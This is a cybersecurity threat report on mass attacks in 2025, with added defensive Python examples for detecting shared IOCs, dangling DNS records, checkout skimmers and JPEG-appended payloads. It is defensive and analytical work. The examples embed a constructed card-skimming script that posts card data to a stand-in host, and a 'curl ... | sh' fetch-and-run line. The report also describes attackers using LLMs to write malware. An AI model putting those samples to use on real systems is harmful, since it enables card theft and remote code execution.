The evolution of mass attacks and a defense strategy

Anna Vyatkina

Analyst, Research Group of PT Cyber Analytics

About this study

This study contains information on current global cybersecurity threats based on Positive Technologies' own expertise and reputable public sources.

It draws on public information about cybersecurity incidents from the first three quarters of 2025. However, some incidents may be reported long after the actual attack took place. This report reflects the most current information available at the time it was first published.

We estimate that most cyberattacks are not made public due to reputational risks. As a consequence, even companies specializing in incident investigation and analysis of hacker activity are unable to quantify the precise number of threats. Our report seeks to draw the attention of companies and individuals to the key motives and methods of cyberattacks, as well as to highlight the main trends in the changing cyberthreat landscape.

This report considers each mass attack (a cyberattack against a wide range of companies or individuals; for example, phishing emails sent to multiple addresses) as one attack, not several, regardless of the number of victims. For explanations of terms used in this report, please refer to the Positive Technologies glossary.

Summary

  • In the first three quarters of 2025, one in five successful attacks against organizations (20%) was a mass attack. Each such attack can hit anywhere from dozens to several thousand victims.
  • Government institutions (12%) and the manufacturing sector (9%) are the most frequent victims of mass attacks on organizations; they're also among the top targets in targeted attacks. The high value of their data, geopolitical importance, rapid digitalization, and immature security practices make government and manufacturing organizations attractive—and vulnerable—targets for cybercriminals.
  • The most common outcome of mass attacks is a confidential data breach (40%). In second place is using the victim's resources for follow‑on attacks (26%)—most often DDoS using the company's infrastructure, phishing campaigns (including messages sent on the victim's behalf), and using the victim's systems to spread malware and attack customers or partners.
  • Beyond direct consequences, mass attacks create systemic problems. They significantly increase the load on defenses and incident response teams. A wave of concurrent incidents can overwhelm response teams, making timely detection and containment harder.
  • Malware was used in 56% of all mass attacks. This approach pays off: investments in developing or buying off‑the‑shelf malware are quickly recouped through large-scale campaigns. Another reason for the widespread use of malware is its high effectiveness and ease of application, which let attackers penetrate companies' IT infrastructure, advance their attacks, and fully compromise critical systems.
  • Remote access trojans (RATs) lead among malware used in mass attacks (34%). They give attackers full control of infected devices, automate data collection, enable lateral movement and the installation of additional malware, and are also used to build botnets. All this makes RATs ideal tools for automated campaigns.
  • Spyware (22%) is widely used in both mass and targeted attacks thanks to its versatility: it can covertly collect sensitive data for later monetization or use in attack chains. At the same time, miners (19%)—though still typical of mass campaigns—are becoming less profitable as crypto‑mining returns decline.
  • Ransomware remains the primary tool in targeted attacks and accounted for 14% of mass attacks involving malware. Its use in mass attacks is set to grow thanks to widely available RaaS platforms and high automation: the low barrier to entry and strong revenue potential make growth in its share likely in the near term.
  • Mass attacks are evolving from simple, easily detected scenarios—based on known IOCs and already disclosed vulnerabilities—to complex, adaptive campaigns that use code obfuscation, automated malware generation, and botnets with dynamic logic. These techniques help mask activity, evade signature‑based detection, and scale attacks without a high risk of rapid discovery. As a result, the line between mass and targeted attacks is increasingly blurred, and effective defense requires behavior‑based analytics, machine learning, and a combination of EPP and EDR solutions.
  • Preventing social engineering and promptly remediating vulnerabilities are critical to defending against mass attacks: this requires regular employee training, email filtering, control of attachments and links, and an effective vulnerability management process.

Introduction

In today's threat landscape, mass cyberattacks are among the most significant risks to organizations: in the first three quarters of 2025, one in five successful attacks against organizations (20%) was a mass attack. The scale and high degree of automation let attackers run campaigns that hit thousands of victims worldwide. In February 2025, a mass campaign by the RansomHub ransomware group was uncovered. The attackers compromised more than 600 organizations, including healthcare and financial institutions, as well as critical infrastructure. They used unique encryption methods, advanced evasion techniques, and the exploitation of known vulnerabilities. The hackers encrypted critical files and demanded ransom for decryption.

Figure 1. Successful attacks on organizations in Q1–Q3 2025

Typical signs of mass campaigns include:

  • Identical indicators of compromise across many victims (for example, the same malicious files or domains)
  • Sharp spikes in activity, where network scanning or connection attempts originate either from the same provider or from large numbers of distributed proxy servers
  • Diverse attack targets, often limited to publicly accessible services—such as mail servers or remote access systems
  • Rapid takeover of as many systems as possible rather than in‑depth reconnaissance
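The signs listed above can be screened for automatically when telemetry from many customers is available in one place. The following is an added example, not code from the report: it parses a constructed cross-customer event feed (the log lines, organization names, and addresses are made up for illustration) and flags indicators shared by several organizations, bursts of scanning from one source network, and the ports that scanning concentrates on. The event format, the /24 grouping, and the thresholds are assumptions for the example.

```python
"""Screening a cross-customer event feed for the hallmarks of a mass campaign."""
import ipaddress
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample feed: "<timestamp> <org> <event> key=value ...".
SAMPLE_EVENTS = """\
2025-03-02T09:00:01 orgA malware_hash sha256=aaa111 src=203.0.113.10
2025-03-02T09:00:05 orgB malware_hash sha256=aaa111 src=203.0.113.11
2025-03-02T09:00:09 orgC malware_hash sha256=aaa111 src=203.0.113.12
2025-03-02T09:00:12 orgD c2_domain domain=update-check.example src=198.51.100.5
2025-03-02T09:00:15 orgE c2_domain domain=update-check.example src=198.51.100.6
2025-03-02T09:00:20 orgA c2_domain domain=intranet.orga.example src=10.0.0.4
2025-03-02T09:01:00 orgA scan dst_port=3389 src=203.0.113.10
2025-03-02T09:01:02 orgB scan dst_port=3389 src=203.0.113.10
2025-03-02T09:01:04 orgC scan dst_port=3389 src=203.0.113.11
2025-03-02T09:01:06 orgD scan dst_port=25 src=203.0.113.11
2025-03-02T09:01:08 orgE scan dst_port=25 src=203.0.113.12
2025-03-02T09:01:10 orgF scan dst_port=443 src=203.0.113.12
2025-03-02T09:30:00 orgF scan dst_port=22 src=192.0.2.77
"""

# Services typically exposed to the internet (assumption for the example).
PUBLIC_SERVICE_PORTS = {22: "ssh", 25: "smtp", 443: "https", 587: "submission",
                        993: "imaps", 3389: "rdp"}


def parse_events(text):
    """Turn the constructed feed into dicts with a parsed timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, org, kind, *kv = line.split()
        fields = dict(item.split("=", 1) for item in kv)
        events.append({"ts": datetime.fromisoformat(ts), "org": org, "kind": kind, **fields})
    return events


def shared_indicators(events, min_orgs=3):
    """Indicators (file hash or domain) observed at >= min_orgs distinct organizations.

    The same IOC at many unrelated victims is the first sign listed in the report.
    """
    seen = defaultdict(set)
    for e in events:
        for key in ("sha256", "domain"):
            if key in e:
                seen[f"{key}={e[key]}"].add(e["org"])
    return {ioc: sorted(orgs) for ioc, orgs in seen.items() if len(orgs) >= min_orgs}


def scan_bursts(events, window_seconds=60, min_targets=5):
    """Bursts of scanning: >= min_targets distinct org:port pairs from one /24 within a window.

    Grouping by /24 is a crude stand-in for "same provider"; a real deployment
    would map sources to ASNs and also aggregate known proxy pools.
    """
    by_prefix = defaultdict(list)
    for e in events:
        if e["kind"] != "scan":
            continue
        net = ipaddress.ip_network(f"{e['src']}/24", strict=False)
        by_prefix[str(net)].append((e["ts"], f"{e['org']}:{e['dst_port']}"))
    bursts = []
    for prefix, hits in by_prefix.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            targets = {tgt for ts, tgt in hits[i:]
                       if (ts - start).total_seconds() <= window_seconds}
            if len(targets) >= min_targets:
                bursts.append({"prefix": prefix, "start": start.isoformat(),
                               "targets": len(targets)})
                break  # one burst per source prefix is enough for triage
    return bursts


def targeted_ports(events):
    """Ports the scanning concentrates on; mass campaigns cluster on exposed services."""
    counts = Counter(int(e["dst_port"]) for e in events if e["kind"] == "scan")
    return [(port, n, PUBLIC_SERVICE_PORTS.get(port, "other")) for port, n in counts.most_common()]


def triage(text):
    events = parse_events(text)
    return {"shared_iocs": shared_indicators(events),
            "scan_bursts": scan_bursts(events),
            "ports": targeted_ports(events)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EVENTS).items():
        print(key, value)
```

On the constructed feed the hash aaa111 is reported because three organizations saw it, the C2 domain is not (only two), and the six scans from 203.0.113.0/24 within ten seconds are reported as a burst concentrated on RDP, SMTP and HTTPS, while the single SSH probe from another network is not.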

Nearly half of mass attacks (47%) aren't tied to a specific industry. Attackers choose targets to gain maximum reach, exploiting standard attack vectors and common vulnerabilities found across many organizations' infrastructures. Government institutions (12%) and the manufacturing sector (9%) are the most frequent victims of mass attacks, and are also among the top victims in targeted attacks. The reasons: strategic importance, high‑value data, and systemic weaknesses in both the public sector and manufacturing.

Figure 2. Categories of victims (percentage of mass attacks on organizations, Q1–Q3 2025)

Government institutions store confidential information about citizens, governance, and national security, which makes them prime targets for attackers. Their geopolitical role further attracts attackers, especially during periods of international tension. A clear example is the mass campaign by Hazy Hawk, which exploited dangling DNS records (typically CNAMEs) that still pointed to cloud resources whose owners had deprovisioned them. The attackers registered new cloud resources under the same names, taking over subdomains of well‑known organizations. This automated campaign compromised dozens of trusted domains, including numerous government services, as well as corporate domains of large companies. Through these subdomains, the attackers ran phishing campaigns, distributed fake applications and malicious ads, and used the parent domains' high reputation to make their content look legitimate to users and search engines.
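The defensive check against this class of takeover is to audit one's own zones for CNAMEs that point to a cloud service name which no longer resolves. The following is an added example, not code from the report or from any Hazy Hawk write-up: it parses a constructed zone fragment and queries a resolver callback, so it runs offline with the constructed answers below and can be pointed at a live zone by supplying a resolver built on dnspython or `dig`. The zone, the answers, and the list of takeover-prone service suffixes are assumptions for the example; a real list is maintained per provider.

```python
"""Finding dangling CNAMEs that a third party could claim (subdomain takeover)."""

# Cloud service suffixes where a deleted resource name can be re-registered
# by anyone (assumption for the example; keep a provider-specific list in practice).
TAKEOVER_PRONE_SUFFIXES = (
    ".cloudapp.azure.com",
    ".azurewebsites.net",
    ".trafficmanager.net",
    ".elasticbeanstalk.com",
    ".s3.amazonaws.com",
    ".herokuapp.com",
    ".github.io",
)

# Constructed zone fragment for a fictional agency.
CONSTRUCTED_ZONE = """\
; constructed zone fragment for agency.example
www            CNAME  agency-prod.azurewebsites.net.
events         CNAME  old-events-2019.cloudapp.azure.com.
portal         CNAME  portal-lb.agency.example.
docs           CNAME  agency-docs.github.io.
api            A      192.0.2.10
"""

# Constructed resolver answers: an empty list stands for NXDOMAIN/NODATA.
FAKE_ANSWERS = {
    "agency-prod.azurewebsites.net": ["A 198.51.100.20"],
    "old-events-2019.cloudapp.azure.com": [],   # resource deleted, name is free to claim
    "portal-lb.agency.example": ["A 192.0.2.11"],
    "agency-docs.github.io": [],                # Pages site removed
}


def fake_resolver(name):
    """Stand-in for a DNS lookup; replace with a real resolver for live use."""
    return FAKE_ANSWERS.get(name, [])


def parse_zone(text, origin):
    """Parse 'name type value' lines; relative names are qualified with origin."""
    records = []
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()     # drop comments
        if not line:
            continue
        name, rtype, value = line.split()
        fqdn = name if name.endswith(".") else f"{name}.{origin}"
        records.append((fqdn.rstrip("."), rtype, value.rstrip(".")))
    return records


def find_dangling_cnames(records, resolve):
    """Return CNAMEs whose target does not resolve.

    A non-resolving target on a takeover-prone service is rated high: the name
    can be claimed by an attacker, exactly the condition Hazy Hawk exploited.
    Any other dead CNAME is still a misconfiguration and is rated medium.
    """
    findings = []
    for name, rtype, target in records:
        if rtype != "CNAME":
            continue
        if resolve(target):
            continue
        prone = any(target.endswith(suffix) for suffix in TAKEOVER_PRONE_SUFFIXES)
        findings.append({"name": name, "target": target,
                         "severity": "high" if prone else "medium"})
    return findings


if __name__ == "__main__":
    for f in find_dangling_cnames(parse_zone(CONSTRUCTED_ZONE, "agency.example"), fake_resolver):
        print(f)
```

Two records in the constructed zone come back as high-severity findings: the event site on a deleted Azure resource and the documentation site on a removed GitHub Pages project. Removing or repointing such records when the cloud resource is decommissioned closes the gap; the check is worth running on a schedule because resources are deleted far more often than DNS is cleaned up.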

The manufacturing sector is also at heightened risk due to rapid digitalization and IT/OT integration, while cybersecurity maturity in this sector remains low. Production systems may run on outdated equipment without modern protections, and disruptions to technological processes can cause shutdowns, financial losses, or even accidents. For example, in January 2025 the Rezet group launched numerous mass attacks on manufacturing companies in Russia. Victims included companies in the chemical, food, and pharmaceutical industries. The attackers sent phishing emails with fake invitations to seminars on standardizing defense products. The emails contained an archive with a PDF and a malicious payload; running it led to system compromise.

Consequences of mass attacks

Mass attacks can lead to serious outcomes for organizations, including non-tolerable events: breaches of confidential data, disruption of business processes, loss of control over infrastructure, and the use of compromised systems for follow‑on attacks. Although they don't target specific victims, mass attacks can cause damage comparable to targeted attacks, due to their scale and high automation.

Figure 3. Consequences of mass attacks (percentage of successful attacks on organizations, Q1–Q3 2025)

The most common consequence is confidential data breach (40% of successful attacks on organizations). Most often, attackers steal credentials (39% of mass attacks that resulted in breaches), payment card data (14%), and trade secrets (7%). They may then sell the stolen data on underground markets—or use it in targeted attacks—creating additional risk for organizations. Data breaches can lead to legal penalties, reputational harm, and loss of partner and customer trust.

Figure 4. Types of stolen data (percentage of mass attacks on organizations, Q1–Q3 2025)

In 2025, researchers identified a campaign in which malware was delivered through fake CAPTCHA checks. On compromised sites, an "I'm not a robot" prompt led victims to run the EDDIESTEALER infostealer on their own systems. The infostealer targets sensitive data, including cryptocurrency wallet addresses, credentials saved in browsers, password manager databases, FTP client configurations, and conversations in messengers.

More than a quarter of mass attacks (26%) result in compromised systems being used to conduct further attacks against both organizations and individuals, a consequence characteristic of mass campaigns. Most often these are DDoS attacks using the company's resources (46%), phishing on behalf of the victim or third parties (31%), use of the victim's resources to distribute malware (14%), and attacks on customers or partners (9%). In January 2025, Casio UK's online store and 17 other sites were compromised when attackers injected a hidden skimmer script into the checkout process. The script intercepted customers' credit card data and sent it to the attackers' servers. The compromised sites served as trusted platforms for collecting sensitive information, which increased user trust and reduced the chance of detection. In this way, the infected company becomes not only a victim but also a tool in the attack chain: here, a channel for stealing customer data.
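A shop can catch an injected skimmer of the kind described above by auditing the scripts its checkout page actually loads against what it expects to load. The following is an added example, not code from the report and not related to the Casio incident's actual script: it parses a constructed checkout page, reports external scripts from hosts outside an allowlist, and reports inline scripts that both read card fields and make a network call to a host outside the allowlist. The page HTML, the allowed hosts, and the heuristics are assumptions for the example.

```python
"""Auditing a checkout page for injected skimmer scripts."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the shop expects to load scripts from (assumption for the example).
SCRIPT_ALLOWLIST = {"shop.example", "cdn.shop.example", "js.payment-provider.example"}

# Heuristics: a script that touches card fields AND sends data somewhere.
CARD_FIELD_RE = re.compile(r"(card|cvv|cvc|expir|pan)\w*", re.I)
EXFIL_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new Image)\b")
URL_RE = re.compile(r"https?://[\w.-]+")

# Constructed page: two legitimate scripts, one injected inline skimmer,
# and one injected loader from an attacker-controlled host.
CONSTRUCTED_CHECKOUT = """
<html><body>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://js.payment-provider.example/v1/pay.js"></script>
<form id="payment">
  <input name="cardNumber"><input name="cvv"><input name="expiry">
</form>
<script>
  document.getElementById('payment').addEventListener('submit', function(){
    var d = {n: document.querySelector('[name=cardNumber]').value,
             c: document.querySelector('[name=cvv]').value};
    fetch('https://stats-collector.example/p', {method:'POST', body: JSON.stringify(d)});
  });
</script>
<script src="https://stats-collector.example/loader.js"></script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        if self._in_script:          # HTMLParser hands script bodies over as data
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_checkout(html, allowlist=SCRIPT_ALLOWLIST):
    """Return findings for unexpected script hosts and skimmer-like inline scripts."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname or ""
        if host not in allowlist:
            findings.append({"type": "unexpected_script_host", "detail": src})
    for body in parser.inline:
        foreign_hosts = {urlparse(u).hostname for u in URL_RE.findall(body)} - allowlist
        if CARD_FIELD_RE.search(body) and EXFIL_RE.search(body) and foreign_hosts:
            findings.append({"type": "inline_skimmer", "detail": sorted(foreign_hosts)})
    return findings


if __name__ == "__main__":
    for finding in audit_checkout(CONSTRUCTED_CHECKOUT):
        print(finding)
```

On the constructed page the audit reports the loader from stats-collector.example and the inline handler that reads cardNumber and cvv and posts them to the same host. The same allowlist belongs in a Content-Security-Policy `script-src` directive and in Subresource Integrity hashes on the legitimate scripts, which stop the injected code from running in the browser rather than merely reporting it after the fact.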

Figure 5. How attackers use compromised systems (percentage of mass attacks on organizations in which victim resources were used for further attacks, Q1–Q3 2025)

Nearly one in four mass attacks disrupted core operations (24%). Mass attacks lead to loss of access to infrastructure or data, customer service disruptions, and interruptions to internal business processes. For example, CVE‑2025‑6543, a memory overflow vulnerability in Citrix NetScaler ADC and NetScaler Gateway, was widely exploited in denial‑of‑service attacks. Several organizations in the Netherlands were attacked via this vulnerability, and the Public Prosecution Service suffered significant disruption: employees lost internet access, were unreachable by email, and Citrix systems had limited functionality.

Beyond direct damage, mass attacks create systemic issues. They sharply increase the load on defense mechanisms and incident response teams. A surge of simultaneous incidents overwhelms SOCs, CSIRTs, and MDR/EDR providers, complicating timely detection and containment of attacks. The constant flood of events generates many false positives, drains analytical resources, and contributes to employee burnout. As a result, even strong defenses can be overloaded, reducing incident response readiness and increasing the risk of critical incidents.

The mechanics of cyberattacks

Malware is the primary tool

The main principle of mass attacks is to reach as many victims as possible at minimal cost. Malware was the attackers' primary tool, used in 56% of successful mass attacks. It is highly effective and relatively easy to use: it allows attackers to gain initial access, establish persistence, and advance through the infrastructure up to full compromise of the domain and critical systems, potentially leading to non-tolerable events. At the early stages of an attack, malware is most often used to gain initial access via malicious email attachments, phishing sites, or vulnerability exploitation. Today's cyberthreat landscape is diverse and fast‑moving, with various tools available depending on attacker goals and resources; investments in custom or off‑the‑shelf malware are quickly recouped through large-scale campaigns.

Figure 6. Methods of mass attacks (percentage of successful attacks on organizations, Q1–Q3 2025)

Another reason for the widespread use of malware is its high availability: the underground market offers a wide range of ready‑made malicious tools for sale or subscription, including infostealers, loaders, RATs, and even ransomware builders under ransomware‑as‑a‑service (RaaS) models. Many tools cost from a few dozen to a few hundred dollars, and leaked manuals from well‑known groups like LockBit and Conti help even novices run complex attacks. The costs of creating or renting malware (for example, under MaaS/RaaS models) are negligible compared with potential profit—ransom, data sales, or selling access to the infrastructure. In our research on the cybercrime market, we explained how net profit from a successful cyberattack can be five times the cost of organizing it.

The most common malware distribution channel is compromising computers, servers, and network equipment (52%): attackers hack devices by bruteforcing credentials or exploiting vulnerabilities. The second channel is through websites (19.5%): infection occurs when victims visit fake or compromised resources, often via automatic malware downloads. The third popular channel is email (18.9%), which remains one of the most effective ways to deliver phishing messages with malicious attachments or links.

Figure 7. Methods used for malware distribution (percentage of mass attacks on organizations, Q1–Q3 2025)

Which types of malware are used in mass attacks

Remote access trojans (RATs) rank first among types of malware used in mass cyberattacks, appearing in one out of three successful attacks (34%). RATs are ideal for mass campaigns, enabling high automation, simultaneous execution, and scalability.

Figure 8. Types of malware (percentage of mass malware attacks, Q1–Q3 2025)

RATs give attackers full control over infected devices: they can execute commands, move laterally, launch other programs, collect data, and install additional malware. This makes RATs ideal for scaling: after compromising one device, an attacker can use it as an entry point to move laterally within the network or to gather information. In March 2025, Head Mare launched a wave of attacks on manufacturing companies in Russia, affecting about 100 organizations. Victims received phishing emails with ZIP attachments. As a result, the PhantomPyramid Python backdoor was installed on infected systems for remote control, along with the legitimate MeshAgent remote management tool, which the attackers passed off as administrative software.

Attackers also use RATs to build botnets—networks of infected devices that can be used for DDoS attacks, spam, phishing, or cryptocurrency mining. Thanks to automated control, such botnets are easy to scale: new victims join the network, and commands are pushed to all nodes at once.

Spyware and miners each appeared in roughly one out of five attacks (22% and 19%, respectively). Spyware is widely used in both mass and targeted attacks because it is so versatile, while miners are becoming less profitable as mining returns fall. Miners only make sense when very large numbers of devices are infected: profit per device is small, but scale adds up, which is why they're popular in mass campaigns. Attackers spread them via phishing or by exploiting vulnerabilities. In targeted attacks, however, miners are rarely used because noticeable performance drops quickly attract attention.

Ransomware remains the primary tool in targeted attacks and accounted for 14% of mass malware attacks; its use in mass campaigns is growing thanks to widely available RaaS platforms and high automation. In February 2025, Russian small and medium-sized businesses faced a new threat: PE32 ransomware, a sophisticated tool that uses post‑quantum cryptography to encrypt data in three rounds. Dozens of companies were affected, with ransom demands ranging from $500 to $150,000, payable in Bitcoin.

Technologies once employed in targeted ransomware attacks are now being adapted for mass use: underground forums increasingly offer RaaS services with ready‑made builders, manuals, and infrastructure for launching attacks. As competition grows in the dark web market, attackers upgrade their platforms with unique features and better evasion techniques to attract more partners. This lets even inexperienced attackers run high‑tech campaigns with automated delivery and defense evasion. As a result, we expect the number and share of mass attacks involving ransomware to keep growing: a low barrier to entry, strong automation, and attractive monetization opportunities make these services appealing to cybercriminals. For example, a new RaaS platform called Pay2Key appeared on Russian cybercrime forums. Built on the Mimic ransomware, it is primarily used in mass attacks but also allows attackers to target specific victims. Despite informal bans on attacks across the CIS, the attackers carried out at least three phishing campaigns against Russian companies in finance, construction, and retail. The attacks started with phishing emails containing malicious RAR attachments or links to files on Dropbox. After a self‑extracting (SFX) archive was launched, Pay2Key was downloaded to the device.

Evolution of mass threats

Artificial intelligence used in malware development

Attackers are increasingly using artificial intelligence and machine learning to prepare and conduct operations. According to our research, attackers already apply AI in 5% of MITRE ATT&CK techniques, including sub‑technique T1587.001 "Develop Capabilities: Malware."

There have already been cases where AI was used to prepare mass attacks. Researchers discovered the Koske mass campaign, whose operators apparently develop malware using large language models (LLMs). The attack begins by compromising a JupyterLab interactive development environment, after which malware is delivered to the victim's system via JPEG images with embedded executable code. Once the file is downloaded, a two‑stage attack begins: a C library implementing a rootkit is executed in memory, and at the same time a shell script is run that downloads and activates a cryptominer. Koske's code is highly structured and heavily commented, strong indicators of AI use. Moreover, the malware shows adaptive behavior: it checks internet access via curl, wget, and raw TCP, automatically restores connectivity through proxies, and switches between mining pools. These traits suggest that AI not only helped generate code but also enabled a more autonomous, stealthy, and resilient threat.
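One common way to hide executable content in a JPEG is to append it after the image's End-Of-Image marker, so the file still opens as a picture while a loader carves out the trailer. The following is an added example, not code from the report or from any Koske analysis, and the appended-trailer layout is an assumption about the technique, since the report only says the images carried embedded code. It walks the JPEG marker structure to find where the image really ends (rather than searching for the last FF D9, which an attacker can defeat by placing a decoy marker in the payload) and classifies whatever follows. The minimal JPEG and the payload below are constructed for the example.

```python
"""Detecting executable payloads appended after a JPEG's End-Of-Image marker."""
import re

# Constructed payload; the decoy FF D9 inside it is what breaks a naive
# "search for the last EOI" approach.
CONSTRUCTED_PAYLOAD = (b"#!/bin/sh\n"
                       b"# constructed payload; contains a decoy EOI \xff\xd9 on purpose\n"
                       b"curl -s http://payload.example/k.sh | sh\n")


def build_constructed_jpeg(payload=b""):
    """Assemble a minimal structurally valid JPEG (SOI, APP0, SOS, EOI) plus a trailer."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    data = b"\xff\xd8"
    data += b"\xff\xe0" + (len(app0) + 2).to_bytes(2, "big") + app0
    sos_hdr = b"\x01\x01\x00\x00\x3f\x00"          # one component, spectral selection fields
    data += b"\xff\xda" + (len(sos_hdr) + 2).to_bytes(2, "big") + sos_hdr
    data += b"\x12\x34\xff\x00\x56\xff\xd0\x78"    # entropy data with FF00 stuffing and RST0
    data += b"\xff\xd9"                            # EOI
    return data + payload


def jpeg_image_end(data):
    """Offset just past the EOI of the JPEG at the start of data, found by walking segments."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos, n = 2, len(data)
    while pos < n:
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        while pos < n and data[pos] == 0xFF:       # markers may be padded with extra FF bytes
            pos += 1
        if pos >= n:
            break
        marker = data[pos]
        pos += 1
        if marker == 0xD9:                         # EOI: the image ends here
            return pos
        if marker in (0x01, *range(0xD0, 0xD8)):   # standalone markers carry no length field
            continue
        pos += int.from_bytes(data[pos:pos + 2], "big")
        if marker == 0xDA:                         # SOS: skip entropy-coded data to next marker
            while pos < n:
                if data[pos] == 0xFF and pos + 1 < n:
                    nxt = data[pos + 1]
                    if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:   # byte stuffing / restart markers
                        pos += 2
                        continue
                    break
                pos += 1
    raise ValueError("no EOI found; truncated JPEG")


def classify_payload(blob):
    """Rough classification of trailing bytes by magic and shell-like content."""
    head = blob.lstrip(b"\r\n\t ")
    if head.startswith(b"\x7fELF"):
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    if head.startswith(b"\xff\xd8"):
        return "second-jpeg"
    if re.search(rb"(curl |wget |chmod |/bin/sh|bash -c|nohup )", blob):
        return "shell-like"
    return "unknown"


def inspect_jpeg(data):
    """Report image length, trailer length and what the trailer looks like."""
    end = jpeg_image_end(data)
    trailer = data[end:]
    return {"image_bytes": end, "trailing_bytes": len(trailer),
            "payload_kind": classify_payload(trailer) if trailer else None}


if __name__ == "__main__":
    print(inspect_jpeg(build_constructed_jpeg()))
    print(inspect_jpeg(build_constructed_jpeg(CONSTRUCTED_PAYLOAD)))
```

For the constructed polyglot the walker stops at offset 40 and reports a script trailer, whereas `data.rfind(b"\xff\xd9")` lands inside the payload because of the decoy marker. Trailing bytes are not proof of malice on their own (some cameras and editors append metadata), so a hit is a reason to pull the file and the process that fetched it into an investigation rather than an alert in itself.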

Malware defense evasion

Modern attackers increasingly pair time-tested tools with the latest hiding techniques. Beyond generating malware, criminals use language models for code obfuscation, which significantly complicates detection and analysis.

Malware development is following two paths:

  • Reworking old code to extend functionality
  • Improving stealth techniques to evade detection systems

In addition to obfuscation, AI can help attackers bypass existing defenses. In August 2025, ESET found an AI‑based ransomware called PromptLock on VirusTotal. The program generates Lua scripts via a GPT model on the fly, so indicators of compromise change with every run. Beyond encryption, the program can be used to steal or destroy data. Researchers later learned this program was only a proof of concept (PoC), not fully functional malware deployed in the wild. Even so, such systems are already sophisticated enough to make security specialists think they are dealing with real malware.

Next-generation bots

Another trait of the evolution of mass attacks is the rise of more sophisticated bots. Imperva's study shows that where bots were once simple and easy to spot, AI has made them adaptive and harder to detect. Attackers increasingly use generative AI and bot‑as‑a‑service (BaaS) platforms to automate the creation of malicious scripts even without deep technical skills, sharply lowering the barrier to entry. Modern bots apply machine learning to analyze defenses, mimic human activity using fake browser fingerprints, residential proxies, and headless browsers, and retry attacks until they succeed. Because they imitate legitimate user behavior so closely, traditional signature‑based measures often fail to detect them.

Conclusions and recommendations

Mass cyberattacks will remain common and dangerous for organizations in 2026. Automated, scalable malware campaigns are growing, and endpoints (computers, servers, and virtual desktops) are becoming the primary targets for cybercriminals. Traditional security systems relied on simple signatures and checks for known vulnerabilities to detect attacks. Today's mass campaigns use code obfuscation, dynamic generation of malicious files, botnets with adaptive logic, and multi‑stage infection chains. These techniques evade static, signature‑based detection, blend in with normal activity, and scale quickly. Effective defense requires a comprehensive approach to endpoint security.

According to AV‑TEST, more than 450,000 new malicious programs and potentially unwanted applications appear every day. The AV‑ATLAS database now tracks over 800 million known samples, and the total number of new threats grows steadily year over year. Traditional antivirus software based solely on signature analysis can no longer provide adequate protection; it can't keep up with the pace of new threats. Even heuristic analysis falls short against AI‑driven obfuscation and polymorphic code.

Modern endpoint protection platforms (EPP) have overtaken old methods as the first—and most critical—line of defense. EPP solutions combine multiple technologies: a signature‑ and heuristic‑based AV engine, malware behavior emulation for detection and blocking, ransomware protection, device and application control, and network threat protection.

Today's EPPs should deliver a multilayered approach and fast response. To be effective, an EPP should include signatures from the past three to four years covering all major malware families.

Given that roughly half a million new threats emerge daily, both the size of the threat database and its update speed are critical. The more frequently new signatures and indicators reach agents, the faster the system can detect new threats. Ideally, updates should be delivered several times per day.

While technology is essential, endpoint security also depends on people. Many mass attacks start with phishing emails carrying malicious attachments or links. Countering social engineering is a key part of endpoint protection, making regular employee training, phishing simulations, and email filtering vital. Efficient vulnerability management also improves endpoint security. Endpoint defenses should be integrated into vulnerability remediation processes to enable automated scanning, provide an accurate assessment of existing vulnerabilities, and facilitate remediation control.